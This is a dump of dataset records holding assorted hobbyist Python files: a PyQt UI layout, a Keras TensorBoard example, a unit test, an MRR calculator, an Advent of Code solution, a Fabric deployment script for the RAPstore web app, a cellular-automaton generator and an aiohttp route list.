SEARCH_MIN_HT))\n font = QFont()\n font.setFamily(FONT_FAMILY)\n font.setPointSize(FONT_SZ_MAX)\n font.setBold(True)\n font.setWeight(75)\n self.gBox_search.setFont(font)\n self.gBox_search.setStyleSheet(f\"\"\"\\\nQComboBox {{\n font-size: {FONT_SZ_DEFAULT}pt;\n font-family: {FONT_FAMILY};\n height: 1.5em;\n}}\nQCheckBox {{\n font-size: {FONT_SZ_DEFAULT}pt;\n font-family: {FONT_FAMILY};\n}}\nQPushButton {{color: #849db8;}}\"\"\")\n self.gBox_search.setObjectName(\"gBox_search\")\n\n self.vLayout_gbox_search = QVBoxLayout(self.gBox_search)\n self.vLayout_gbox_search.setContentsMargins(PAD, PAD*3, PAD, PAD)\n self.vLayout_gbox_search.setSpacing(PAD)\n self.vLayout_gbox_search.setObjectName(\"vLayout_gbox_search\")\n\n self.gBox_search_categories = QGroupBox(self.gBox_search)\n self.gBox_search_categories.setTitle(\"Categories\")\n font = QFont()\n font.setFamily(FONT_FAMILY)\n font.setPointSize(FONT_SZ_HEADER)\n self.gBox_search_categories.setFont(font)\n self.gBox_search_categories.setObjectName(\"gBox_search_categories\")\n self.gLayout_search_categories = QGridLayout(\n self.gBox_search_categories)\n self.gLayout_search_categories.setContentsMargins(PAD, PAD*2, PAD, PAD)\n self.gLayout_search_categories.setObjectName(\n \"gLayout_search_categories\")\n self.vLayout_gbox_search.addWidget(self.gBox_search_categories)\n\n self.gBox_search_tags = QGroupBox(self.gBox_search)\n self.gBox_search_tags.setTitle(\"Tags\")\n font = QFont()\n font.setFamily(FONT_FAMILY)\n font.setPointSize(FONT_SZ_HEADER)\n self.gBox_search_tags.setFont(font)\n self.gBox_search_tags.setObjectName(\"gBox_search_tags\")\n self.gLayout_search_tags = QGridLayout(self.gBox_search_tags)\n self.gLayout_search_tags.setContentsMargins(PAD, PAD, PAD, PAD)\n self.gLayout_search_tags.setSpacing(PAD)\n self.gLayout_search_tags.setObjectName(\"gLayout_search_tags\")\n self.vLayout_gbox_search.addWidget(self.gBox_search_tags)\n self.hLayout_search_btns = QHBoxLayout()\n self.hLayout_search_btns.setSpacing(0)\n self.hLayout_search_btns.setObjectName(\"hLayout_search_btns\")\n\n self.btn_search_clear = QPushButton(\"Clear\", self.gBox_search)\n sizePolicy = QSizePolicy(\n QSizePolicy.Fixed, QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(\n self.btn_search_clear.sizePolicy().hasHeightForWidth())\n self.btn_search_clear.setSizePolicy(sizePolicy)\n self.btn_search_clear.setObjectName(\"btn_search_clear\")\n self.hLayout_search_btns.addWidget(self.btn_search_clear)\n\n self.btn_search_search = QPushButton(\"Search\", self.gBox_search)\n sizePolicy = QSizePolicy(\n QSizePolicy.Fixed, QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(\n self.btn_search_search.sizePolicy().hasHeightForWidth())\n self.btn_search_search.setSizePolicy(sizePolicy)\n self.btn_search_search.setObjectName(\"btn_search_search\")\n self.hLayout_search_btns.addWidget(self.btn_search_search)\n self.vLayout_gbox_search.addLayout(self.hLayout_search_btns)\n self.hLayout_search.addWidget(self.gBox_search)\n spacerItem1 = QSpacerItem(\n 40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)\n self.hLayout_search.addItem(spacerItem1)\n self.vLayout_centralwidget.addLayout(self.hLayout_search)\n\n self.tabWidget = QTabWidget(self.centralwidget)\n font = QFont()\n font.setFamily(FONT_FAMILY)\n font.setPointSize(FONT_SZ_TITLE)\n self.tabWidget.setFont(font)\n self.tabWidget.setTabShape(QTabWidget.Triangular)\n self.tabWidget.setObjectName(\"tabWidget\")\n\n (self.tab_rPlayed,\n self.hLayout_tab_rPlayed,\n self.scrollArea_tab_rPlayed,\n self.scrollAreaContents_tab_rPlayed,\n self.vLayout_tab_rPlayed) = self.createTab(tab_name='rPlayed',\n tab_title='Recently Played')\n\n (self.tab_rUpdated,\n self.hLayout_tab_rUpdated,\n self.scrollArea_tab_rUpdated,\n self.scrollAreaContents_tab_rUpdated,\n self.vLayout_tab_rUpdated) = self.createTab(tab_name=\"rUpdated\",\n tab_title=\"Recently Updated\")\n\n (self.tab_rAdded,\n self.hLayout_tab_rAdded,\n self.scrollArea_tab_rAdded,\n self.scrollAreaContents_tab_rAdded,\n self.vLayout_tab_rAdded) = self.createTab(tab_name=\"rAdded\",\n tab_title=\"Recently Added\")\n\n (self.tab_numA,\n self.hLayout_tab_numA,\n self.scrollArea_tab_numA,\n self.scrollAreaContents_tab_numA,\n self.vLayout_tab_numA) = self.createTab(tab_name=\"numA\",\n tab_title=\"#-A\")\n\n (self.tab_BC,\n self.hLayout_tab_BC,\n self.scrollArea_tab_BC,\n self.scrollAreaContents_tab_BC,\n self.vLayout_tab_BC) = self.createTab(tab_name=\"BC\",\n tab_title=\"B-C\")\n\n (self.tab_DE,\n self.hLayout_tab_DE,\n self.scrollArea_tab_DE,\n self.scrollAreaContents_tab_DE,\n self.vLayout_tab_DE) = self.createTab(tab_name=\"DE\",\n tab_title=\"D-E\")\n\n (self.tab_FG,\n self.hLayout_tab_FG,\n self.scrollArea_tab_FG,\n self.scrollAreaContents_tab_FG,\n self.vLayout_tab_FG) = self.createTab(tab_name=\"FG\",\n tab_title=\"F-G\")\n\n (self.tab_HI,\n self.hLayout_tab_HI,\n self.scrollArea_tab_HI,\n self.scrollAreaContents_tab_HI,\n self.vLayout_tab_HI) = self.createTab(tab_name=\"HI\",\n tab_title=\"H-I\")\n\n (self.tab_JK,\n self.hLayout_tab_JK,\n self.scrollArea_tab_JK,\n self.scrollAreaContents_tab_JK,\n self.vLayout_tab_JK) = self.createTab(tab_name=\"JK\",\n tab_title=\"J-K\")\n\n (self.tab_LM,\n self.hLayout_tab_LM,\n self.scrollArea_tab_LM,\n self.scrollAreaContents_tab_LM,\n self.vLayout_tab_LM) = self.createTab(tab_name=\"LM\",\n tab_title=\"L-M\")\n\n (self.tab_NO,\n self.hLayout_tab_NO,\n self.scrollArea_tab_NO,\n self.scrollAreaContents_tab_NO,\n self.vLayout_tab_NO) = self.createTab(tab_name=\"NO\",\n tab_title=\"N-O\")\n\n (self.tab_PQR,\n self.hLayout_tab_PQR,\n self.scrollArea_tab_PQR,\n self.scrollAreaContents_tab_PQR,\n self.vLayout_tab_PQR) = self.createTab(tab_name=\"PQR\",\n tab_title=\"P-R\")\n\n (self.tab_ST,\n self.hLayout_tab_ST,\n self.scrollArea_tab_ST,\n self.scrollAreaContents_tab_ST,\n self.vLayout_tab_ST) = self.createTab(tab_name=\"ST\",\n tab_title=\"S-T\")\n\n (self.tab_UV,\n self.hLayout_tab_UV,\n self.scrollArea_tab_UV,\n self.scrollAreaContents_tab_UV,\n self.vLayout_tab_UV) = self.createTab(tab_name=\"UV\",\n tab_title=\"U-V\")\n\n (self.tab_WXYZ,\n self.hLayout_tab_WXYZ,\n self.scrollArea_tab_WXYZ,\n self.scrollAreaContents_tab_WXYZ,\n self.vLayout_tab_WXYZ) = self.createTab(tab_name=\"WXYZ\",\n tab_title=\"W-Z\")\n\n self.vLayout_centralwidget.addWidget(self.tabWidget)\n MainWindow.setCentralWidget(self.centralwidget)\n\n self.menubar = QMenuBar(MainWindow)\n self.menubar.setGeometry(QRect(0, 0, MAIN_WD, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n\n self.menu_new_games = QMenu(\"New Games\", self.menubar)\n self.menu_new_games.setObjectName(\"menu_new_games\")\n self.menubar.addAction(self.menu_new_games.menuAction())\n\n self.menuAction_check = QAction(\"Check for new games\", MainWindow)\n self.menuAction_check.setObjectName(\"menuAction_check\")\n self.menu_new_games.addAction(self.menuAction_check)\n\n self.menuAction_add = QAction(\"Manually Add\", MainWindow)\n self.menuAction_add.setObjectName(\"menuAction_add\")\n self.menu_new_games.addAction(self.menuAction_add)\n\n self.menuAction_add_bundle = QAction(\n \"Add a bundle\", MainWindow)\n self.menuAction_add_bundle.setObjectName(\"menuAction_add_bundle\")\n self.menu_new_games.addAction(self.menuAction_add_bundle)\n\n self.menu_verify = QMenu(\"Verify\", self.menubar)\n self.menu_verify.setObjectName(\"menu_verify\")\n self.menubar.addAction(self.menu_verify.menuAction())\n\n self.menuAction_verify_tags = QAction(\"Tags\", MainWindow)\n self.menuAction_verify_tags.setObjectName(\"menuAction_verify_tags\")\n self.menu_verify.addAction(self.menuAction_verify_tags)\n\n self.menuAction_verify_exes = QAction(\"Executables\", MainWindow)\n self.menuAction_verify_exes.setObjectName(\"menuAction_verify_exes\")\n self.menu_verify.addAction(self.menuAction_verify_exes)\n\n self.tabWidget.setCurrentIndex(0)\n QMetaObject.connectSlotsByName(MainWindow)\n\n def createTab(self, tab_name: str, tab_title: str) -> tuple[QWidget, QHBoxLayout, QScrollArea, QWidget, QVBoxLayout]:\n tab = QWidget()\n tab.setObjectName(f\"tab_{tab_name}\")\n\n hLayout = QHBoxLayout(tab)\n hLayout.setContentsMargins(0, 0, 0, 0)\n hLayout.setSpacing(0)\n hLayout.setObjectName(f\"hLayout_tab_{tab_name}\")\n\n scrollArea = QScrollArea(tab)\n scrollArea.setWidgetResizable(True)\n scrollArea.setAlignment(\n Qt.AlignLeading | Qt.AlignLeft | Qt.AlignTop)\n scrollArea.setObjectName(f\"scrollArea_tab_{tab_name}\")\n\n scrollAreaContents = QWidget()\n scrollAreaContents.setGeometry(QRect(0, 0, 98, 28))\n scrollAreaContents.setObjectName(\n f\"scrollAreaContents_tab_{tab_name}\")\n\n vLayout = QVBoxLayout(scrollAreaContents)\n vLayout.setContentsMargins(PAD, PAD, PAD, PAD)\n vLayout.setSpacing(PAD)\n vLayout.setAlignment(Qt.AlignLeading | Qt.AlignLeft | Qt.AlignTop)\n vLayout.setObjectName(f\"vLayout_tab_{tab_name}\")\n\n scrollArea.setWidget(scrollAreaContents)\n hLayout.addWidget(scrollArea)\n self.tabWidget.addTab(tab, tab_title)\n return (tab, hLayout, scrollArea, scrollAreaContents, vLayout)\n","repo_name":"Cryden13/GameBrowser","sub_path":"src/browse/ui_browse.py","file_name":"ui_browse.py","file_ext":"py","file_size_in_byte":13396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36753198981","text":"#keras47_tensorboard.py\n\n\nimport numpy as np \nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM\n\n# 1. 데이터 \n\na = np.array (range(1,101))\nsize = 5 # time_steps = 4\n\n\ndef split_x (seq, size) :\n aaa = []\n for i in range(len(seq) - size + 1 ) :\n subset = seq[ i: (i + size)]\n aaa.append([item for item in subset]) \n \n return np.array(aaa)\n\n\ndataset = split_x(a,size) #(6,5)\nprint(type(dataset)) \n\nx =dataset [ :, 0:4] \ny =dataset [ :, 4]\n\n\nx = x.reshape(96,4,1)\ny = y.reshape(96,1)\n\n\n\n# 2. 모델 구성 \n\n# from keras.models import load_model \n# model = load_model('./model/save_keras44.h5')\n\n# 모델 보기 쉽게 간단하게 만들기 \n\nmodel = Sequential()\nmodel.add(LSTM(5, activation='relu', input_shape = (4,1))) \nmodel.add(Dense(3))\nmodel.add(Dense(1,name = 'out')) \n\n# model.summary()\n\n\n# 3. 훈련\nfrom keras.callbacks import EarlyStopping, TensorBoard # tensorboard 는 callbacks에! \n\n\ntb_hist = TensorBoard(log_dir = 'graph', histogram_freq = 0, write_graph= True, write_images= True)\n\n'''\n graph 파일 하단에 train 과 vaildation 폴더가 생성된다 \n\n cmd 들어가서 cd '하위 파일명' 으로 계속 들어간다\n\n graph 파일에 도착하면 tensorboard --logdir=./path/logs/ 입력\n\n 크롬에 해당 주소 입력 ( http://localhost:6006/)\n\n fin. \n\n\n 자나깨나 항상 경로 조심! \n\n'''\nealry_stopping= EarlyStopping(monitor='loss', patience= 50, mode = 'auto') \n\n\nmodel.compile(optimizer='adam', loss = 'mse', metrics = ['acc'])\nhist = model.fit(x,y, epochs= 10000, batch_size = 1, callbacks= [ealry_stopping, tb_hist], validation_split = 0.2 )\n\n\n\n# print(hist)\n# print(hist.history.keys())\n\n\nimport matplotlib.pyplot as plt\n\nplt.plot(hist.history['loss']) # plot 추가 = 선 추가 \nplt.plot(hist.history['acc'])\nplt.plot(hist.history['val_acc'])\nplt.plot(hist.history['val_loss'])\n\nplt.title('loss & acc')\nplt.xlabel('epoch')\nplt.ylabel('loss,acc')\nplt.legend(['train loss', 'test loss', 'train acc', 'test acc'])\n# plt.show()\n\n\n\n\n'''\n#. 4. 평가 및 예측 \n\nloss,mse = model.evaluate(x, y, batch_size = 1) \n\nx_predict = np.array(x) \ny_predict = model.predict(x)\n\nprint('loss :', loss)\nprint('mse :', mse)\n'''","repo_name":"votus777/AI_study","sub_path":"keras/keras47_tensorboard.py","file_name":"keras47_tensorboard.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14988072733","text":"from ....testing_tools.context import get_empty_context\nfrom ....testing_tools.mocks import get_context_with_mocks\nfrom ....testing_tools.nodes import render_for_phase_and_shape, Phase, ConfigShape, assert_unsupported\nfrom .....constants import ConstantNamespace\nfrom .....constants.method import TagName\nfrom .....method.loading import load_yaml\n\n\nclass TestParam(ConstantNamespace):\n method_identity = 'path/to::some_method==production'\n user_selection_value = 'some_selection_name'\n state_target = 'state_target'\n\n\ndef test_choice_tag():\n # Phase.EXECUTE, ConfigShape.LIST\n node = load_yaml(\n f'''\n {TagName.Choice}\n - {TagName.SelectionValue}\n - {TestParam.user_selection_value}\n - {TagName.BODY}\n - {TagName.Method}\n - {TagName.IDENTITY} {TestParam.method_identity}\n - {TagName.OUTPUT}\n - {TagName.State}\n {TestParam.state_target}: {TagName.Output} \n '''\n )\n context = get_context_with_mocks()\n output = render_for_phase_and_shape(Phase.EXECUTE, ConfigShape.LIST, node, context)\n assert output[0].result == f'Mock-executed method {TestParam.method_identity}'\n\n unsupported = [\n (Phase.EXECUTE, ConfigShape.DICT),\n (Phase.EXECUTE, ConfigShape.SCALAR),\n (Phase.OUTPUT, ConfigShape.DICT),\n (Phase.OUTPUT, ConfigShape.LIST),\n (Phase.OUTPUT, ConfigShape.SCALAR),\n ]\n context = get_empty_context()\n assert_unsupported(unsupported, node, context)","repo_name":"dylanbenden/python-wfscript","sub_path":"src/wfscript/tests/method/nodes/container/test_choice.py","file_name":"test_choice.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8951640102","text":"import numpy as np\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\n\r\nengsentenceembedding = open('','r')\r\ndesentenceembedding = open('','r')\r\n\r\n# process sentence embedding file\r\nengsent = []\r\ndesent = []\r\nfor line in engsentenceembedding:\r\n word = ''\r\n vectorlist = []\r\n for char in line:\r\n if char != ' ':\r\n word += char\r\n else:\r\n vectorlist.append(float(word))\r\n word = ''\r\n engsent.append(vectorlist)\r\n\r\nfor line in desentenceembedding:\r\n word = ''\r\n vectorlist = []\r\n for char in line:\r\n if char != ' ':\r\n word += char\r\n else:\r\n vectorlist.append(float(word))\r\n word = ''\r\n desent.append(vectorlist)\r\n\r\n#compare eng sentence to all german sentence\r\nrrlist = []\r\nfor engline in engsent:\r\n cossimilarity = []\r\n for deline in desent:\r\n cossimilarity.append(cosine_similarity([engline],[deline]))\r\n actualline = cossimilarity[engsent.index(engline)]\r\n orderedcos = cossimilarity.sort(reverse = True)\r\n rank = cossimilarity.index(int(actualline))\r\n reciprocalrank = 1/rank\r\n rrlist.append(reciprocalrank)\r\n\r\nvalue = 0\r\nfor i in rrlist:\r\n value += i \r\nmrr = value / len(rrlist)\r\nprint(mrr)\r\n\r\nwith open('/project/results/paper2/mrrResult', 'w+', encoding='utf-8') as writeFile:\r\n writeFile.write(mrr)","repo_name":"ThinkerPal/nlp-scripts","sub_path":"mrrcalculator.py","file_name":"mrrcalculator.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1804503698","text":"\nimport sys\nimport numpy as np\n\nraw = sys.stdin.read()\n\nlines = [[[int(v) for v in p.split(',')] for p in l.split(' -> ')] for l in raw.split('\\n') if len(l) > 0]\nlines = [((l[0][0], l[1][0]), (l[0][1], l[1][1])) for l in lines]\n\nwidth = 1 + max([max(l[0][0], l[1][0]) for l in lines])\nheight = 1 + max([max(l[0][1], l[1][1]) for l in lines])\n\nmap = np.zeros((width, height), dtype=int)\n\nfor l in lines:\n if l[0][0] == l[0][1]:\n map[l[0][0], min(l[1]):1 + max(l[1])] += 1\n elif l[1][0] == l[1][1]:\n map[min(l[0]):1 + max(l[0]), l[1][0]] += 1\n\nprint('Result:', (map >= 2).sum())\n\n","repo_name":"rolandbernard/adventofcode-2021","sub_path":"05.hydrothermal-venture/py/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28030728726","text":"# -*- coding:utf-8 -*-\n\"\"\"Rapstore\n\nProject repository: https://github.com/riot-appstore/rapstore\n\"\"\"\n\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\n\nimport os.path\n\nfrom io import BytesIO\n\nfrom fabric.api import task, run, sudo, put, execute\nfrom fabric.contrib.files import sed\nfrom fabric.context_managers import cd\n\nfrom . import common\nfrom .config import server_config as config\n\nCUR_DIR = os.path.abspath(os.path.dirname(__file__))\nROOT_DIR = \"/home/root\"\n\n\n@task\ndef setup():\n \"\"\"Setup RIOT AppMarket\"\"\"\n common.apt_install('python-mysqldb')\n common.apt_install('python-pip')\n\n run('pip install pycrypto')\n execute(setup_apache)\n execute(setup_www_data)\n\n # Debugging library\n run('pip install q')\n\n\nGITCONFIG = '''\\\n[user]\n\\temail = {user}@localhost\n\\tname = {title} {title}\n'''\n\n\n@task\ndef setup_www_data():\n \"\"\"Setup www-data .gitconfig for compiling packages (using git am).\"\"\"\n user = 'www-data'\n gitconfig = GITCONFIG.format(user=user, title=user.title())\n config = BytesIO(gitconfig.encode('utf-8'))\n put(config, '/var/www/.gitconfig', use_sudo=True)\n sudo('chown -R www-data:www-data /var/www/')\n\n\n@task\ndef setup_nginx():\n put(\"nginx\", \"/var/www\", use_sudo=True)\n sudo('chown -R www-data:www-data /var/www')\n with cd(\"/var/www/nginx\"):\n sudo('cp /etc/letsencrypt/live/demo.riot-apps.net/$(readlink /etc/letsencrypt/live/demo.riot-apps.net/fullchain.pem) /home/root/ssl/fullchain.pem')\n sudo('cp /etc/letsencrypt/live/demo.riot-apps.net/$(readlink /etc/letsencrypt/live/demo.riot-apps.net/privkey.pem) /home/root/ssl/privkey.pem')\n sudo('docker stop nginx || true')\n sudo('docker rm nginx || true')\n sudo('docker build -t nginx .')\n sudo('docker run -d -v /home/root/ssl:/etc/nginx/certs --net=host --name nginx -t nginx')\n\n@task\ndef setup_apache():\n \"\"\"Setup apache server.\"\"\"\n site = '000-default.conf'\n rapstore_conf = '/etc/apache2/sites-available/%s' % site\n\n common.apt_install('apache2')\n sudo('a2enmod cgi')\n sudo('a2enmod proxy_http')\n\n put(common.template('rapstore/apache2/%s' % site), config.RAPSTORE_WEBSITE_ROOT, use_sudo=True)\n sed(rapstore_conf, 'DOCUMENT_ROOT', config.RAPSTORE_WEBSITE_DOCUMENT_ROOT, use_sudo=True)\n sed(rapstore_conf, 'RESOURCES_ROOT', config.RAPSTORE_WEBSITE_ROOT, use_sudo=True)\n sudo('a2ensite %s' % site)\n\n execute(setup_rapstore)\n execute(setup_database)\n execute(update_database)\n\n sudo('systemctl restart apache2')\n\n\n@task\ndef setup_rapstore():\n \"\"\"Setup RIOT AM application.\"\"\"\n _setup_rapstore_website_repository()\n _setup_rapstore_backend()\n\n\ndef _setup_rapstore_website_repository(directory=config.RAPSTORE_WEBSITE_ROOT, version='master'):\n \"\"\"Clone website.\"\"\"\n common.clone_repo(config.RAPSTORE_WEBSITE_REPO, directory, version, run_as_user='www-data')\n\n # setup config file with password\n path_to_config = os.path.join(directory, 'rapstore_website', 'config')\n config_file = os.path.join(path_to_config, 'config.py')\n sudo('cp {src} {dst}'.format(src=os.path.join(path_to_config, 'config_EXAMPLE.py'),\n dst=config_file))\n\n # replace password in config file inline\n common.replace_word_in_file(config_file, 'PASSWORD_WEBSITE', config.RAPSTORE_WEBSITE_DB_PASSWORD)\n common.replace_word_in_file(config_file, 'YOUR_SECRET_KEY', config.GITHUB_SECRET_KEY)\n\n writeable_dirs = ['log']\n with cd(directory):\n dirs = ' '.join(writeable_dirs)\n sudo('mkdir -p %s' % dirs)\n sudo('chown www-data %s' % dirs)\n\n put(os.path.join(CUR_DIR, os.pardir,'website.pem'), directory, use_sudo=True)\n\n path_website_key = os.path.join(directory, 'website.pem')\n\n sudo('chmod 600 %s' % path_website_key)\n sudo('chown www-data:www-data %s' % path_website_key)\n\n\ndef _deploy_rapstore(branch_name, env_file, folder_name=None, dirty=None, prod=False):\n execute(setup_www_data)\n folder_name = folder_name if folder_name else branch_name\n folder=os.path.join(config.WWW_HOME,folder_name)\n sudo('mkdir -p %s' % folder)\n sudo('chown www-data %s' % folder)\n with cd(folder):\n common.pull_or_clone(config.RAPSTORE_DJANGO_REPO, 'rapstore-django', branch_name, '', run_as_user='www-data')\n if not dirty:\n put('docker-compose.yml', os.path.join(folder, \"docker-compose.yml\"), use_sudo=True)\n if not prod:\n put('docker-compose.override.yml', os.path.join(folder, \"docker-compose.override.yml\"), use_sudo=True)\n else:\n put('docker-compose.prod.yml', os.path.join(folder, \"docker-compose.override.yml\"), use_sudo=True)\n put(env_file, os.path.join(folder, \".env\"), use_sudo=True)\n sudo(\"cat {0}/.oauth.{1} >> .env \".format(ROOT_DIR, folder_name))\n common.docker_refresh()\n\ndef _populate_db(folder_name):\n folder=os.path.join(config.WWW_HOME,folder_name)\n with cd(folder):\n sudo('docker-compose exec web python manage.py populate_db')\n\ndef _createsuperuser(folder_name):\n folder=os.path.join(config.WWW_HOME,folder_name)\n with cd(folder):\n sudo('docker-compose exec web python manage.py createsuperuser')\n\n\ndef _validate_folder(folder_name):\n if folder_name not in [\"develop\", \"master\", \"staging\"]:\n return False\n return True\n\n@task\ndef populate_db(folder=\"develop\"):\n if(_validate_folder(folder)):\n _populate_db(folder)\n\n@task\ndef createsuperuser(folder=\"develop\"):\n if(_validate_folder(folder)):\n _createsuperuser(folder)\n\ndef _setup_rapstore_backend(directory=config.RAPSTORE_BACKEND, version='master'):\n \"\"\"Clone backend which clones RIOT.\n\n Setup write permissions on required directories.\n \"\"\"\n common.clone_repo(config.RAPSTORE_BACKEND_REPO, directory, version, '--recursive', run_as_user='www-data')\n sudo('chmod -R g-w %s' % directory) # TODO: fixup in the repository\n\n # setup config file with password\n config_file_config = os.path.join(os.path.join(directory, 'rapstore_backend', 'config', 'config.py'))\n config_file_setup = os.path.join(os.path.join(directory, 'rapstore_backend', 'setup', 'db_config.py'))\n\n sudo('cp {src} {dst}'.format(src=os.path.join(directory, 'rapstore_backend', 'config', 'config_EXAMPLE.py'),\n dst=config_file_config))\n\n sudo('cp {src} {dst}'.format(src=os.path.join(directory, 'rapstore_backend', 'setup', 'db_config_EXAMPLE.py'),\n dst=config_file_setup))\n\n # replace password in config file inline\n common.replace_word_in_file(config_file_config, 'PASSWORD_BACKEND', config.RAPSTORE_BACKEND_DB_PASSWORD)\n common.replace_word_in_file(config_file_config, 'PASSWORD_WEBSITE', config.RAPSTORE_WEBSITE_DB_PASSWORD)\n\n common.replace_word_in_file(config_file_setup, 'PASSWORD_BACKEND', config.RAPSTORE_BACKEND_DB_PASSWORD)\n common.replace_word_in_file(config_file_setup, 'PASSWORD_WEBSITE', config.RAPSTORE_WEBSITE_DB_PASSWORD)\n\n common.replace_word_in_file(config_file_setup, 'USER_PRIVILEGED', config.DB_USER)\n common.replace_word_in_file(config_file_setup, 'PASSWORD_PRIVILEGED', config.DB_PASSWORD)\n\n _setup_riot_stripped(os.path.join(directory, 'rapstore_backend'))\n _setup_rapstore_backend_writeable_directories(directory)\n\n\ndef _setup_riot_stripped(directory):\n \"\"\"Create RIOT_stripped for the backend.\"\"\"\n with cd(directory):\n sudo('python strip_riot_repo.py')\n\n\ndef _setup_rapstore_backend_writeable_directories(directory):\n \"\"\"Setup the writeable directories required by the backend.\"\"\"\n # TODO set this configurable somehow\n writeable_dirs = ['tmp', 'log', 'RIOT/generated_by_rapstore']\n with cd(directory):\n dirs = ' '.join(writeable_dirs)\n sudo('mkdir -p %s' % dirs)\n sudo('chown www-data %s' % dirs)\n\n\n@task\ndef setup_database():\n \"\"\"Setup database.\n\n Install and init tables.\n \"\"\"\n common.apt_install('mysql-server')\n\n # Scripts expects to be run from the setup directory\n with cd(os.path.join(config.RAPSTORE_BACKEND, 'rapstore_backend', 'setup')):\n\n sudo('python %s' % 'db_create.py')\n sudo('python %s' % 'db_setup.py')\n\n\n@task\ndef update_database():\n \"\"\"Update database with RIOT information.\"\"\"\n with cd(os.path.join(config.RAPSTORE_BACKEND, 'rapstore_backend', 'tasks', 'database')):\n sudo('python %s' % 'db_update.py')\n","repo_name":"riot-appstore/rapstore-vm","sub_path":"rapstorevm/rapstore.py","file_name":"rapstore.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24371093929","text":"#!/usr/bin/env python3\nfrom copy import deepcopy\n\nimport curses\nimport time\nimport numpy as np\nimport random\n\nimport helper\n\ndef show(stdscr, matrix):\n\tfor x in range(len(matrix)):\n\t\tfor y in range(len(matrix[0])):\n\t\t\tif matrix[x][y] == 0:\n\t\t\t\tstdscr.insstr(x,y,\".\")\n\t\t\telse:\n\t\t\t\tstdscr.insstr(x,y,\"\\u2588\")\n\tstdscr.refresh()\n\ndef init(rows,columns, seed = None):\n\t#procedural generation\n\trandom.seed(seed)\n\tmatrix = np.zeros((rows,columns), dtype=int)\n\n\tfor x in range(rows):\n\t\tfor y in range(columns):\n\t\t\tif random.randint(0,1) == 0: \n\t\t\t\tmatrix[x][y] = 1\n\t\t\telse:\n\t\t\t\tmatrix[x][y] = 0\n\treturn matrix\n\ndef cave(matrix, generations):\n\t##CODE HERE##\n\treplacement = []\n\tfor z in range(generations):\n\t\treplacement = np.ones((len(matrix),len(matrix[0])),dtype = int)\n\t\t\n\t\tfor x in range(1,len(matrix)-1):\n\t\t\tfor y in range(1,len(matrix[0])-1):\n\t\t\t\t\n\t\t\t\ttotal = -matrix[x][y]\n\t\t\t\tfor a in range(x-1,x+2):\n\t\t\t\t\tfor b in range(y-1,y+2):\n\t\t\t\t\t\ttotal += matrix[a][b]\n\n\t\t\t\tif total > 5:\n\t\t\t\t\treplacement[x][y] = 1\n\t\t\t\telif total < 4:\n\t\t\t\t\treplacement[x][y] = 0\n\t\t\t\telse:\n\t\t\t\t\treplacement[x][y] = matrix[x][y]\n\n\t\tmatrix = replacement\n\treturn replacement\n\ndef evolve(matrix):\n\t##CODE HERE##\n\treplacement = np.zeros((len(matrix),len(matrix[0])),dtype = int)\n\n\tfor x in range(1,len(matrix)-1):\n\t\tfor y in range(1,len(matrix[0])-1):\n\t\t\t\n\t\t\ttotal = -matrix[x][y]\n\t\t\tfor a in range(x-1,x+2):\n\t\t\t\tfor b in range(y-1,y+2):\n\t\t\t\t\ttotal += matrix[a][b]\n\n\t\t\tif matrix[x][y] != 0:\n\t\t\t\tif total < 2:\n\t\t\t\t\treplacement[x][y] = 0\n\t\t\t\telif total == 2 or total == 3:\n\t\t\t\t\treplacement[x][y] = 1\n\t\t\t\telif total > 3:\n\t\t\t\t\treplacement[x][y] = 0\n\t\t\telse:\n\t\t\t\tif total == 3:\n\t\t\t\t\treplacement[x][y] = 1\n\t\t\t\telse:\n\t\t\t\t\treplacement[x][y] = 0\n\n\treturn replacement\n\ndef main(stdscr):\n\thelper.setup()\n\trows, columns = helper.screen_size()\n\n\tautoma = init(rows,columns)\n\tshow(stdscr,automa)\n\n\t##CODE HERE##\n\n\twhile True:\n\t\tchoice = chr(stdscr.getch())\n\n\t\tif choice == \"0\":\n\t\t\tbreak;\n\n\t\tautoma = cave(automa, 1)\n\t\t#automa = evolve(automa)\n\t\tshow(stdscr,automa)\n\n#MAIN\nif (__name__ == '__main__'):\n\tcurses.wrapper(main)\n","repo_name":"iron512/LCSEproject","sub_path":"automa.py","file_name":"automa.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23354290240","text":"import re\nfrom aiohttp import web\nimport os\nfrom aiohttp_middlewares import cors_middleware\n\nfrom handlers import *\n\n\n# cors_rules = cors_middleware(origins=[re.compile(r\"(localhost(:[\\d]+))?\")])\n# middlewares = [cors_rules]\napp = web.Application()\n\napp.add_routes(\n [\n web.get(\"/\", index),\n web.post(\"/transcripts/-/feed\", create_feed_transcript),\n web.get(\"/transcripts\", get_transcripts),\n web.post(\"/transcripts\", create_transcript),\n web.delete(\"/transcripts/{id}\", delete_transcript),\n web.put(\"/transcripts/{id}\", update_transcript),\n web.get(\"/transcripts/{id}\", get_transcript_resource),\n web.post(\"/transcripts:create_table\", create_transcript_table),\n web.delete(\"/transcripts:drop_table\", drop_transcript_table),\n web.post(\"/transcripts:seed\", seed_transcript),\n web.get(\"/documentation\", documentation),\n 